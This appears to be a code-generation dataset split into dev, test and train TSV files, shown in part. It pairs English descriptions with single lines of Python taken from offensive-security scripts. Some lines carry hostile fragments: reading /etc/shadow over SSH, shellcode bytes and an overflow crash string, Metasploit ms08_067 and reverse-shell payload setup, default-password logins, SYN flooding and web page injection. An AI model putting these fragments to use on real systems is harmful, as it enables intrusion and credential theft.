Upload 3 files
Browse files- dev_singleline.tsv +114 -0
- test_singleline.tsv +114 -0
- train_singleline.tsv +903 -0
@@ -0,0 +1,114 @@
1 |
Intent Script
2 |
Call the function retrlines with arguments 'RETR ' concatenated to page and the method write of f ftp.retrlines('RETR ' + page, f.write)
3 |
Call the method start with no arguments on t t.start()
4 |
Define the function connect with arguments user, host and password def connect(user, host, password):
5 |
Create the scoket with parameters AF_INET and SOCK_STREAM connSkt = socket(AF_INET, SOCK_STREAM)
6 |
For each tgtPort in tgtPorts for tgtPort in tgtPorts:
7 |
Call the method sendline with argument 'yes' of child child.sendline('yes')
8 |
Import the library for for file transfer protol connections import ftplib
9 |
Call the function google with argoment 'Boondock Saint' google('Boondock Saint')
10 |
Call the function quote_plus of urllib with argument search_term and assign it to search_terms search_term = urllib.quote_plus(search_term)
11 |
Call the function listDir with argument recycleDir concatenated to sid of os and assign it to files files = os.listdir(recycleDir + sid)
12 |
Call the method login on s with arguments self.host, self.user, self.password s.login(self.host, self.user, self.password)
13 |
If the function has_key with argument 'href' of link returns True if link.has_key('href'):
14 |
Define the function printLinks with argument url def printLinks(url):
15 |
Send the packet ackPkt send(ackPkt)
16 |
Create a packet pkt with source src, destination dst, ICMP type 8 and id equals to 456 pkt = IP(src=src,dst=dst)/ICMP(type=0,id=456)
17 |
Define the function printMeta with argument fileName def printMeta(fileName):
18 |
Call the function urlopen with argument url of urllib2 and call the method read with no arguments and assign it to urlContent urlContent = urllib2.urlopen(url).read()
19 |
Assign to text the variable row at position 2 text = row[2]
20 |
If state is equal to 'open' if state == 'open':
21 |
Call the function viewPage with argument 'http://www.syngress.com/' viewPage('http://www.syngress.com/')
22 |
For x from 1 to 5 for x in range(1, 5):
23 |
"Create a packet pkt with source src, destination dst, UDP with destination port equals to 635 and the load equals to ""^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F""" "pkt = IP(src=src, dst=dst) / UDP(dport=635) /Raw(load=""^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F"")"
24 |
Assign to stream the concatenation of src, ':' and dst stream = src + ':' + dst
25 |
Define the function findHivemind with argument pcap def findHivemind(pcap):
26 |
Open the file pcapFile and assign it to f f = open(pcapFile)
27 |
Assign to pktsSent the value of pktCount with key stream pktsSent = pktCount[stream]
28 |
If pcapFile of options is equal to None if options.pcapFile == None:
29 |
Assign to longitude the field 'longitude' of rec longitude = rec['longitude']
30 |
Read the html code of page and assign it to source_code source_code = page.read()
31 |
Define the function calTSN with argument tgt def calTSN(tgt):
32 |
Define the function printCallLog with argument skypeDB def printCallLog(skypeDB):
33 |
Call the method strip with argument '\n' of password then call the method strip with argument '\r' and assign the result to password password = password.strip('\\n').strip('\r')
34 |
Call the method quit with no argument of ftp ftp.quit()
35 |
If dport is equal to 6667 if dport == 6667:
36 |
Import the library to parse the url import urlparse
37 |
Assign to links the result of the function findall with argument html of link_finder links = link_finder.findall(html)
38 |
"and ""\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6""" """\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6"""
39 |
Call the function EnumKey with arguments key and i and assign it to guid guid = EnumKey(key, i)
40 |
Assign to pktCount at key stream the value 1 pktCount[stream] = 1
41 |
Import the library for TCP/IP protocols import dpkt
42 |
Call the function send_command with arguments child and 'cat /etc/shadow | grep root' send_command(child, 'cat /etc/shadow | grep root')
43 |
Call the method findAll with argument 'img' of soup and assign it to image_tags image_tags = soup.findAll('img')
44 |
Define the function returnDefault with argument ftp def returnDefault(ftp):
45 |
Increment the variable Fails by 1 Fails += 1
46 |
Define the function send_command with arguments child and cmd def send_command(child, cmd):
47 |
"and ""\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49""" """\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49"""
48 |
Assign to ttl the ttl of pkt casted to str ttl = str(pkt.ttl)
49 |
Else else:
50 |
Call the class BeautifulSoup with argument html and assign it to soup soup = BeautifulSoup(html)
51 |
If the substring 'synchronize with original prompt' is found in the result of the function str with argument e elif 'synchronize with original prompt' in str(e):
52 |
Call the method connect with a tuple made of target and 21 of s s.connect((target,21))
53 |
Assign to seqNum the result of the function calTSN with argument tgt plus one seqNum = calTSN(tgt) + 1
54 |
Call the method join with arguments passDir and filename of os.path and assign it to fullpath fullpath = os.path.join(passDir, filename)
55 |
Connect to tgtHost on tgtPort connSkt.connect((tgtHost, tgtPort))
56 |
For each tgtHost in tgt tgtHosts for tgtHost in tgtHosts:
57 |
Try try:
58 |
Assign to src the ip sorgent of ip.src src = socket.inet_ntoa(ip.src)
59 |
Call the function findall with arguments r'maplat=.*\&' and resp from re and assign it to rLat rLat = re.findall(r'maplat=.*\&', resp)
60 |
If the variable tgtHost of options is equal to None or lhost of options is equal to None if (options.tgtHost == None) | (options.lhost == None):
61 |
Create an empty dictionary and assign it to pktCount pktCount = {}
62 |
Assign to links the result of the function findAll with argument name equals to 'a' of soup links = soup.findAll(name='a')
63 |
Call the function printMessage with argument iphoneDB printMessage(iphoneDB)
64 |
Continue the argument and the tuple with password and True password, True))
65 |
nan for (ts, buf) in pcap:
66 |
Assign the response of the method open with argument 'http://kittenwar.com' of ab response = ab.open('http://kittenwar.com')
67 |
Call the function str with value options.tgtPort then call the function split with argument ',' and assign the result totgtPorts tgtPorts = str(options.tgtPort).split(',')
68 |
Call method sendline with argument 'yes' of child child.sendline('yes')
69 |
If the functions len with argument argv of sys returns a value less than 2 if len(sys.argv) < 2:
70 |
If cookiesDB is a file if os.path.isfile(cookiesDB):
71 |
Create the constant THRESH with value 1000 THRESH = 1000
72 |
For each cookie in the cookie_jar for cookie in cookie_jar:
73 |
If release is equal to True then call the method release with no arguments of connection_lock if release: connection_lock.release()
74 |
Start try block try:
75 |
If the method isdir with argument recycleDir of path of os returns True if os.path.isdir(recycleDir):
76 |
Call the function retKML with argument src and assign it to srcKML srcKML = retKML(src)
77 |
Call the method anonumize with no argument of ab ab.anonymize()
78 |
For each argument in the tuple ts and buf in pcap for (ts, buf) in pcap:
79 |
Assign to dir the variable dir of options dir = options.dir
80 |
Call the method recv with argument 1024 of s s.recv(1024)
81 |
Create a packet pkt with source src, destination dst, UDP with destination port equals to 7 and the load equals to 'cybercop' pkt = IP(src=src, dst=dst) / UDP(dport=7) /Raw(load='cybercop')
82 |
Call the method login with arguments userName and passWord of ftp ftp.login(userName, passWord)
83 |
Call the function urlencode with argument a dictionary with key 'credential_0' and value username and assign it reqData reqData = urllib.urlencode({'credential_0': username,
84 |
Call the method append with argument fileName of retList retList.append(fileName)
85 |
Assign to pkt the value of the the function IP with dst equals to tgt divided by the function TCP with no arguments pkt = IP(dst=tgt) / TCP()
86 |
Define the function findAttack with argument pcap def findAttack(pcap):
87 |
Open the file 'geotest.pcap' and assign it to f f = open('geotest.pcap')
88 |
Call the function parse_args with no arguments and return the result to the tuple composed of options and args (options, args) = parser.parse_args()
89 |
If iface of options is equal to None if options.iface == None:
90 |
Assign to lat the field 'latitude' of rec lat = rec['latitude']
91 |
Call the method open with argument 'http://wigle.net' of browser browser.open('http://wigle.net')
92 |
Assign to url the result with key 'url' url = result['url']
93 |
Assign to exifData sliced at decoded the value value exifData[decoded] = value
94 |
Assign to rdata the value rdata of the method getlayer with argument DNSRR of pkt rdata = pkt.getlayer(DNSRR).rdata
95 |
"Assign to parser the OptionParser with argument the concatenation of""usage %prog "" and ""-p <skype profile path> """ "parser = optparse.OptionParser(""usage %prog ""+ ""-p <skype profile path> "")"
96 |
Get the list of the folders in pathName and assign it to dirList dirList = os.listdir(pathName)
97 |
Call the function exit with argument 0 of sys sys.exit(0)
98 |
From the library to manages thread import everything from threading import *
99 |
Assign to uri the uri of http in lower case uri = http.uri.lower()
100 |
"and ""\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5""" """\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5"""
101 |
Import the library to navigate web through web forms import mechanize
102 |
Concatenate the string '\\' and concatenate the string sid, close the arguments + '\\' + sid)
103 |
Continue the arguments with help='specify wigle password' help='specify wigle password')
104 |
Assign to date the result of function str with argument row at position 1 date = str(row[1])
105 |
Assign to dport the dport of tcp dport = tcp.dport
106 |
Import everything from the library used for thread from threading import *
107 |
Assign to pcapFile the pcapFile of options pcapFile = options.pcapFile
108 |
For each image in image_tags for image in image_tags:
109 |
Parse the usage prod pd target host and the target port parser = optparse.OptionParser('usage %prog -H <target host> -p <target port>')
110 |
Define the function dnsQRTest with argument pkt def dnsQRTest(pkt):
111 |
Import the library to estabilish a SSH connection import pxssh
112 |
Call the method write of configFile with argument 'set payload ' and continue to the next line configFile.write('set payload '+\
113 |
Call the method strip with argument '\n' on the method strip with argument '\r' of line and assign the result to password password = line.strip('\r').strip('\\n')
114 |
Define the function printMessages with argument skypeDB def printMessages(skypeDB):
@@ -0,0 +1,114 @@
1 |
Intent Script
2 |
Assign 0 to seqNum seqNum = 0
3 |
Exit the function with argument geoLoc return geoLoc
4 |
Exit with value 0 exit(0)
5 |
Instantiate the class BoundedSemaphore with argument value equals to maxConnections and assign the result to connection_lock connection_lock = BoundedSemaphore(value=maxConnections)
6 |
"Call the method send with argument command concatenated to "" "" concatenated to crash concatenated to ""\r\n""" "s.send(command +"" "" + crash + ""\r\\n"")"
7 |
If username is equal to None or password is equals to None if username == None or password == None:
8 |
Send the packet synPkt send(synPkt)
9 |
Start try block try:
10 |
Start the expection block with arguments Exception and e except Exception, e:
11 |
Call function send_command with arguments s and 'cat /etc/shadow | grep root' send_command(s, 'cat /etc/shadow | grep root')
12 |
"Assign to shellcode the tuple containing ""\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9""" "shellcode = (""\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9"""
13 |
"Continue the value with ""\NetworkList\Signatures\Unmanaged""" """\NetworkList\Signatures\Unmanaged"""
14 |
If the method haslayer with argument DNSRR of pkt is True if pkt.haslayer(DNSRR):
15 |
"and ""\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8""" """\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8"""
16 |
If rLat exists if rLat:
17 |
Define the cursor c of the database c = conn.cursor()
18 |
Import the library to control the operative system import os
19 |
import everything from the library for threads from threading import *
20 |
Concatenate the strings kmlPts = kmlPts + srcKML + dstKML
21 |
Assign to opt the value ' -o PasswordAuthentication=no' opt = ' -o PasswordAuthentication=no'
22 |
Release the lock screenLock.release()
23 |
Add the option of the parser p for tgtPort as a string with help specify target port[s] separated by comma parser.add_option('-p', dest='tgtPort', type='string',help='specify target port[s] separated by comma')
24 |
Call the open function with argument 'meta.rc' and 'w' configFile = open('meta.rc', 'w')
25 |
Set a proxy to browser with address proxy browser.set_proxies(proxy)
26 |
Continue the argument with help 'specify wigle username' help='specify wigle username')
27 |
Assign to synSpoof the sunSpoof of options synSpoof = options.synSpoof
28 |
Call the method spawn with argument connStr of pexpect and assign it to child child = pexpect.spawn(connStr)
29 |
Import the library to manage time import time
30 |
Acquire the lock screenLock.acquire()
31 |
Call the method split with argument '\\' and slice at position -1 and assign it to user user = value.split('\\')[-1]
32 |
If passwdFile is not equal to None if passwdFile != None:
33 |
Assign to TCPlayer the result of the function TCP with argument sport equals sport and dport equals to 513 TCPlayer = TCP(sport=sport, dport=513)
34 |
Exit the function with argument imgFileName return imgFileName
35 |
For each ch in val for ch in val:
36 |
import the library for parsing import optparse
37 |
Call the method login with arguments userName and passWord of ftp ftp.login(userName, passWord)
38 |
If the value of Fails is more than 5 if Fails > 5:
39 |
If the substring 'read_nonblocking' is found in the result of the function str with argument e if 'read_nonblocking' in str(e):
40 |
Assign to the value tcp the data of ip tcp = ip.data
41 |
Add the options to parser '-i', dest equals to 'iface', type equals to 'string', help equals to 'specify network interface' parser.add_option('-i', dest='iface', type='string',help='specify network interface')
42 |
Define function connect with arguments host user and password def connect(host, user, password):
43 |
Assign to skypeDB the path of main.db inside the pathName skypeDB = os.path.join(pathName, 'main.db')
44 |
From the library to manipulate IPs import IP as IPTEST from IPy import IP as IPTEST
45 |
Assign to kml and empty string kmlPts = ''
46 |
Assign an empty list to dnsRecords at the key rrname dnsRecords[rrname] = []
47 |
Call the method parse_args with no argument on parser and assign it to the tuple composed of options and args (options, args) = parser.parse_args()
48 |
"Assign to parser the OptionParser with argument the concatenation of""usage %prog "" and ""-p <firefox profile path> """ "parser = optparse.OptionParser(""usage %prog ""+""-p <firefox profile path> "")"
49 |
Assign to c the cursor of conn c = conn.cursor()
50 |
Call the function printGoogle with argument placesDB printGoogle(placesDB)
51 |
If the absolute value of ttl casted to int minus the ttlValues at the hey ipsrc casted at int is more than THRESH if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
52 |
Append to the list dnsRecords at the key rrname the value rdata dnsRecords[rrname].append(rdata)
53 |
Assign to mapLat the value rLat at the position 0, then call the function split with argument '&' at the position 0, then call the function split with argument '=' at the position 1 mapLat = rLat[0].split('&')[0].split('=')[1]
54 |
Define the function testUserAgent with argument url an userAgent def testUserAgent(url, userAgent):
55 |
Connect to the database placesDB and assign it to conn conn = sqlite3.connect(placesDB)
56 |
Call the method append with argument host of tgtHosts tgtHosts.append(host)
57 |
Call the addClient function with arguments '', 'root' and 'toor' addClient('', 'root', 'toor')
58 |
Call the method write of configFile with argument 'setg DisablePayloadHandler 1\n' configFile.write('setg DisablePayloadHandler 1\\n')
59 |
Call the method split with argument ':' on line, take the the result in position 1, call the strip method with argument '\r' then call the strip method with argument '\n' and assign it to passWord passWord = line.split(':')[1].strip('\r').strip('\\n')
60 |
Assign to soup the result of BeautufulSoup with argument html soup = BeautifulSoup(html)
61 |
Call the method write of configFile with argument 'set RHOST ' concatenated to the function str with argument tgtHost concatenated to '\n' configFile.write('set RHOST ' + str(tgtHost) + '\\n')
62 |
Continue the argument and concatenation with 'windows/meterpreter/reverse_tcp\n' 'windows/meterpreter/reverse_tcp\\n')
63 |
Call the function confickerExploit with arguments configFile, tgtHost, lhost and lport confickerExploit(configFile, tgtHost, lhost, lport)
64 |
For each recycleDir in dirs for recycleDir in dirs:
65 |
Exit the function with tuple userName and passWord return (userName, passWord)
66 |
Assign to password the value password of options password = options.password
67 |
Call the function FTP with argument hostname of the library ftplib and assign it to ftp ftp = ftplib.FTP(hostname)
68 |
"Assign to link_finder the function compile with argument 'href=""(.*?)""' of re" "link_finder = re.compile('href=""(.*?)""')"
69 |
"and ""\xba\x1e\x53\x31""" """\xba\x1e\x53\x31"")"
70 |
Assign to latitude the field 'latitude' of rec latitude = rec['latitude']
71 |
Assign the value '' to host host = ''
72 |
Assign to text the result with key 'content' text = result['content']
73 |
From the library to manipulate packets import everything from scapy.all import *
74 |
Define the function synFlood with arguments src and tgt def synFlood(src, tgt):
75 |
Call the function listDir with argument recycleDir of os and assign the result to dirList dirList = os.listdir(recycleDir)
76 |
Call the function nlst with no argument from the library ftp and assign to dirList dirList = ftp.nlst()
77 |
Assign to r the result of all the substring that match the pattern r'q=.*\&' of url r = re.findall(r'q=.*\&', url)
78 |
"Continue the arguments with value ""SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList""" """SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList"""
79 |
Continue the argument and the list with the value '[P|p]assword:' '[P|p]assword:'])
80 |
Assign to addr the value '' addr = ''
81 |
From the library to edit the Windows registry import everything from _winreg import *
82 |
Get the record for that IP and assign it to rec rec = gi.record_by_name(ip)
83 |
Import the library to manipulate json files import json
84 |
Assign the value True to the variable Found Found = True
85 |
Start the try block except:
86 |
If the thresh of options is not equal to None if options.thresh != None:
87 |
For each cookie in the cookie_jar of ab for cookie in ab.cookie_jar:
88 |
Assign to passWord the value 'guest' passWord = 'guest'
89 |
Define the function val2addr with argument val def val2addr(val):
90 |
Assign to url the result of function str with argument row at position 0 url = str(row[0])
91 |
Call the method acquire with no arguments of connection_lock connection_lock.acquire()
92 |
Assign to src the src of options src = options.src
93 |
For each pkt in pkts for pkt in pkts:
94 |
Call the method write of configFile with argument 'exploit -j -z\n' configFile.write('exploit -j -z\\n')
95 |
Call the function wiglePrint with argument username, password and macAddr wiglePrint(username, password, macAddr)
96 |
Assign to url the value 'http://ip.nefsc.noaa.gov/' url = 'http://ip.nefsc.noaa.gov/'
97 |
Assign the value user to self.user self.user = user
98 |
Call the function printCookies with argument url printCookies(url)
99 |
Assign to userAgent a tuple made of 'User-agent' and 'Mozilla/5.0 (X11; U; '+ 'Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01' inside a list userAgent = [('User-agent', 'Mozilla/5.0 (X11; U; '+ 'Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01')]
100 |
"and ""\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96""" """\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96"""
101 |
"Assign to kmlheader the string '<?xml version=""1.0"" encoding=""UTF-8""?><kml xmlns=""http://www.opengis.net/kml/2.2"">\n<Document>\n'" "kmlheader = '<?xml version=""1.0"" encoding=""UTF-8""?><kml xmlns=""http://www.opengis.net/kml/2.2"">\\n<Document>\\n'"
102 |
Start try block try:
103 |
Exit the function with value True return True
104 |
Assign to country the field 'country_name' of rec country = rec['country_name']
105 |
Call the function sleep with argument 4 of the library time time.sleep(4)
106 |
From the library to parse HTML import BeautifilSoup from bs4 import BeautifulSoup
107 |
Open the page at the url and assign it to page page = browser.open(url)
108 |
Assing to preNum seqNum preNum = seqNum
109 |
Assign True to the variable Stop Stop = True
110 |
Exit function and return the value addr return addr
111 |
If rLon exists if rLon:
112 |
Import the library to use a sqlite database import sqlite3
113 |
Add the option -u for url as type string with help equals to 'specify url address' parser.add_option('-u', dest='url', type='string', help='specify url address')
114 |
Define the function printGoogle with argument placesDB def printGoogle(placesDB):
@@ -0,0 +1,903 @@
1 |
Intent Script
2 |
Create a parser with OptionParser 'usage %prog -p <pcap file> -t <thresh>' "parser = optparse.OptionParser(""usage %prog '+'-p <pcap file> -t <thresh>"" )"
3 |
Define the function retGeoStr with argument ip def retGeoStr(ip):
4 |
Assign to the variable host the value 'localhost' host = 'localhost'
5 |
Define the function printPcap with argument pcap def printPcap(pcap):
6 |
Call the function exit with argument 0 exit(0)
7 |
Change the scope of the variable Fails to global global Fails
8 |
Assign to filename the function join of path of os with arguments dir and the method replace with arguments '/' and '_' of filename filename = os.path.join(dir,filename.replace('/', '_'))
9 |
Remove from search 'q=' and '+' search=search.replace('q=', '').replace('+', ' ')
10 |
Import the library for the regular expressions import re
11 |
Read the file passwdFile and assign it to pF pF = open(passwdFile, 'r')
12 |
Call function pxssh of library pxssh with no arguments and assign it to s s = pxssh.pxssh()
13 |
Assign to long the field 'longitude' of rec long = rec['longitude']
14 |
Assign to THRESH the value thresh of options THRESH = options.thresh
15 |
Define the class Google_result class Google_Result:
16 |
If count of options is equal to None if options.count == None:
17 |
Assign to url the url of options url = options.url
18 |
Assign to dirs a list containing 'C:\\Recycler\\','C:\\Recycled\\','C:\\$Recycle.Bin\\' dirs=['C:\\Recycler\\','C:\\Recycled\\','C:\\$Recycle.Bin\\']
19 |
Call the function findRecycledDir findRecycled(recycledDir)
20 |
Import the library to interact with operative system import os
21 |
Get the record for that IP and assign it to rec rec = gi.record_by_name(ip)
22 |
Assign the variable user of options to user user = options.user
23 |
Assign to pkts the result of the function rdpcap with argument 'domainFlux.cap' pkts = rdpcap('domainFlux.pcap')
24 |
Assign to mapLon the value 'N/A' mapLon = 'N/A'
25 |
Import the library to scan the ports import nmap
26 |
Call the function open with argument imgFileName and 'wb' and assign it to imgFile imgFile = open(imgFileName, 'wb')
27 |
Assign to ans the result of the functionsr1 with argument pkt and verbose equals to 0 ans = sr1(pkt, verbose=0)
28 |
Continue the arguments with help equals to 'specify PDF file name' help='specify PDF file name')
29 |
Call the function sniff with argument prn equals testTTL and store equals to 0 sniff(prn=testTTL, store=0)
30 |
Exit the function with user value return user
31 |
Define the function testForExif with argument imgFIleName def testForExif(imgFileName):
32 |
Define the function addClient with arguments host, user and password def addClient(host, user, password):
33 |
Define the function scanTest with arguments src, dst, iface and count def scanTest(src, dst, iface, count):
34 |
Continue the argument and concatenation with 'windows/meterpreter/reverse_tcp\n' 'windows/meterpreter/reverse_tcp\\n')
35 |
Exit function with value False return False
36 |
Assign to title the result with key 'titleNoFormatting' title = result['titleNoFormatting']
37 |
Add the option of the parser H for tgtHost as a string with help specify target host parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
38 |
For each attempt from 1 to 5 for attempt in range(1, 5):
39 |
Call the method strip with argument ' ' of addr, call the method replace with arguments ' ' and ':', take the values from 0 to 17 and assign it to addr addr = addr.strip(' ').replace(' ', ':')[0:17]
40 |
Call the member function user of options and assign it to user user = options.user
41 |
Start except block except:
42 |
Call the method add_option with arguments '-k', dest equals to 'keyword', type equals to 'string' and help= equals to 'specify target url' parser.add_option('-k', dest='keyword', type='string', help='specify google keyword')
43 |
Assign to platform the value argv at position 2 of sys platform = sys.argv[2]
44 |
Assign to parser the OptionParser with argument the concatenation of 'usage %prog ' and '-k <keywords>' of optparse parser = optparse.OptionParser('usage %prog ' + '-k <keywords>')
45 |
Get the record for that IP and assign it to rec rec = gi.record_by_name(tgt)
46 |
Call the method start of t and assign the result to child child = t.start()
47 |
Do nothing pass
48 |
Assign to city the field 'country_code3' of rec country = rec['country_code3']
49 |
Parse the usage prod pd target host, the target port, the user and the directory parser = optparse.OptionParser('usage %prog -H '+ '<target host> -u <user> -d <directory>')
50 |
Assign to iface of conf the value iface of options conf.iface = options.iface
51 |
Assign to host the value of the function str with argument row at the position 0 host = str(row[0])
52 |
Call the function findTgts with argument tgtHost of options and assign it to tgtHosts tgtHosts = findTgts(options.tgtHost)
53 |
Change the scope of the variable Found to global global Found
54 |
Assign the variable tgtHost of options to host host = options.tgtHost
55 |
For each item in dnsRecords for item in dnsRecords:
56 |
Exit function with argument True return True
57 |
For each sid in dirList for sid in dirList:
58 |
Call the function scanTest with arguments src, dst, iface and count scanTest(src, dst, iface, count)
59 |
Assign to respURL the value 'http://wigle.net/gps/gps/main/confirmquery/' respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
60 |
If the substring '!lazor' is in data of tcp in lower case if '!lazor' in tcp.data.lower():
61 |
Call the method write of configFile with argument 'set payload ' and concatenate next line configFile.write('set payload '+\
62 |
From the library used for interact with windows registry import everything from _winreg import *
63 |
"and ""\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3""" """\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3"""
64 |
Import the library for file transfer protocol import ftplib
65 |
If sport is equal to 6667 if sport == 6667:
66 |
Call the function bruteLogin with argument host and passwdFile bruteLogin(host, passwdFile)
67 |
Call the function injectPage with arguments ftp, 'index.html' and redirect injectPage(ftp, 'index.html', redirect)
68 |
Assign to url of self the value url self.url = url
69 |
If pktsSent is more than THRESH if pktsSent > THRESH:
70 |
Call the method write with argument imgContent of imgFile imgFile.write(imgContent)
71 |
"Execute the command ""select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;""on c" "c.execute(""select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;"")"
72 |
Else else:
73 |
Append the new_gr to the list results results.append(new_gr)
74 |
If the method has_key with argument ipsrc of ttlValues is not True if not ttlValues.has_key(ipsrc):
75 |
Define the function mirrorImages with argument url and dir def mirrorImages(url, dir):
76 |
Call the method add_option with arguments '-u', dest equals to 'tgtURL', type equals to 'string' and help equals to 'specify target url' parser.add_option('-u', dest='tgtURL', type='string', help='specify target url')
77 |
Start expect block except:
78 |
Instantiate a Semaphore named screenLock initialized with variable values equals 1 screenLock = Semaphore(value=1)
79 |
Return the variable kmlPts return kmlPts
80 |
Exit the cycle break
81 |
Add the option of the parser u for user as a string with help specify the user parser.add_option('-u', dest='user', type='string', help='specify the user')
82 |
Read all the network traffic from f and assign it to pcap pcap = dpkt.pcap.Reader(f)
83 |
Call the function printHistory with argument placesDB printHistory(placesDB)
84 |
Assign to IPlayer the result of the function IP with src equals src and dst equals to tgt IPlayer = IP(src=src, dst=tgt)
85 |
Call the method anonymize with no argument of ab ab.anonymize()
86 |
Call the function send with argument pkt send(pkt)
87 |
Call function connect with arguments '', 'root' and 'toor' s = connect('', 'root', 'toor')
88 |
Assign to mapLat the value 'N/A' mapLat = 'N/A'
89 |
Assign to the tuple options and args the method parse_args with no arguments of parser (options, args) = parser.parse_args()
90 |
For each result in response with keys 'responseData' and 'results' for result in objects['responseData']['results']:
91 |
Assign to hideMeProxy the dictionary with key 'http' and value equals to '' hideMeProxy = {'http': ''}
92 |
If the functions len with argument argv of sys returns a value bigger than 2 if len(sys.argv) > 2:
93 |
Open the url and assign it to page page = browser.open(url)
94 |
"Call the method send with argument ""PASS \r\n"" of s" "s.send(""PASS \r\\n"")"
95 |
Assign to ip the data of eth ip = eth.data
96 |
Assign to tgt the tgt of options tgt = options.tgt
97 |
Call the object PdfFileReader with argument file with arguments fileName and 'rb' and assign it to pdfFile pdfFile = PdfFileReader(file(fileName, 'rb'))
98 |
Call the method add_option with arguments '-F', dest equals to 'fileName' and type equals to 'string' of parser parser.add_option('-F', dest='fileName', type='string',\
99 |
Assign to msgDirection the concatenation of From, the function str with argument row at position 1 and : msgDirection = 'From ' + str(row[2]) + ' : '
100 |
Assign to TCPlayer the result of the function TCP with argument sport equals to 513 and dport equals to 514 TCPlayer = TCP(sport=513, dport=514)
101 |
Call the function PortScanner with no argument from the library nmap and assign nmScan = nmap.PortScanner()
102 |
Return the title of self return self.title
103 |
For each line in the method readlines with no argument of pF for line in pF.readlines():
104 |
Call method acquire on screenLock with no arguments screenLock.acquire()
105 |
Call the method tgtHost on options and assign the result to tgtHost tgtHost = options.tgtHost
106 |
Call the method _getexif with no argument of imgFile and assign it to info info = imgFile._getexif()
107 |
Assign to text of self the value text self.text = text
108 |
Assign to perm_denied the value 'Permission denied' perm_denied = 'Permission denied'
109 |
If the substring encrypted is in the string e if 'encrypted' in str(e):
110 |
Import the library for parsing import optparse
111 |
Call the method pxssh with no arguments of the package pxssh and assign it to s s = pxssh.pxssh()
112 |
Create an empty dictionary and assign it to dnsRecords dnsRecords = {}
113 |
Parse the argument into the tuple made of options and args (options, args) = parser.parse_args()
114 |
Call the function EnumValue with argument netKey and 4 and assign the result to the tuple n, name and t (n, name, t) = EnumValue(netKey, 4)
115 |
Assign to dst the tgt of options dst = options.tgt
116 |
Parse the usage prod pd target host and the target port parser = optparse.OptionParser('usage %prog '+ '-H <target host> -p <target port>')
117 |
Call the function anonLogin with argument host anonLogin(host)
118 |
From the library to manipulate Exif data of image import TAGS from PIL.ExifTags import TAGS
119 |
Import the library to parse html and xml from BeautifulSoup import BeautifulSoup
120 |
Define the function with anonLogin with argument hostname def anonLogin(hostname):
121 |
Do nothing pass
122 |
Import the library to interact with a sqlite database import sqlite3
123 |
Define function botnetCommand with argument command def botnetCommand(command):
124 |
Start expect block except:
125 |
If preNum is not equal to 0 if preNum != 0:
126 |
Call the function printRecord with argument tgt printRecord(tgt)
127 |
Assign to date the result of the function str with argument row at the position 0 date = str(row[0])
128 |
If the substring partlist is not in the function str with argument row at the position 3 if 'partlist' not in str(row[3]):
129 |
Assign to THRESH five THRESH = 5
130 |
Call function gethostbyaddr with argument tgtIP assign the result to tgtName tgtName = gethostbyaddr(tgtIP)
131 |
Call the function printNets with arguments username and password printNets(username, password)
132 |
Call the method write of configFile with argument 'set LPORT' concatenated to the function str with argument lport concatenated to '\n' configFile.write('set LPORT ' + str(lport) + '\\n')
133 |
Assign to ttlValues at the key ipsrc the value ttl of pkt ttlValues[ipsrc] = pkt.ttl
134 |
Call the function portScan with arguments tgtHost and tgtPorts portScan(tgtHost, tgtPorts)
135 |
If thresh of options is not None if options.thresh != None:
136 |
If url is equal to None if url == None:
137 |
Exit function returning value self.session.before return self.session.before
138 |
"Call the method send with argument ""USER anonymous\r\n"" of s" "s.send(""USER anonymous\r\\n"")"
139 |
Call the function split of rLon at the position 0 and assign it to mapLon mapLon = rLon[0].split
140 |
"Assign to crash the value ""\x41"" multiply by 246 concatenated to ret concatenated to paddling concatenated to shellcode" "crash = ""\x41"" * 246 + ret + padding + shellcode"
141 |
Call the method back with no argument of ab ab.back()
142 |
Import the library to manage cookies import cookielib
143 |
Assign to value the value of the function str with argument row at the position 2 value = str(row[2])
144 |
Assign to command the value argv at position 2 of sys command = sys.argv[2]
145 |
Return an empty string return ''
146 |
Else else:
147 |
Call method sendline with argument cmd on s s.sendline(cmd)
148 |
From the library to manipulate Pdf import PdfFileReader from pyPdf import PdfFileReader
149 |
Call the object BeautifulSoup with argument urlContent and assign it to soup soup = BeautifulSoup(urlContent)
150 |
Close the save file save.close()
151 |
Call the method write of configFile with argument 'use exploit/windows/smb/ms08_067_netapi\n' configFile.write('use exploit/windows/smb/ms08_067_netapi\\n')
152 |
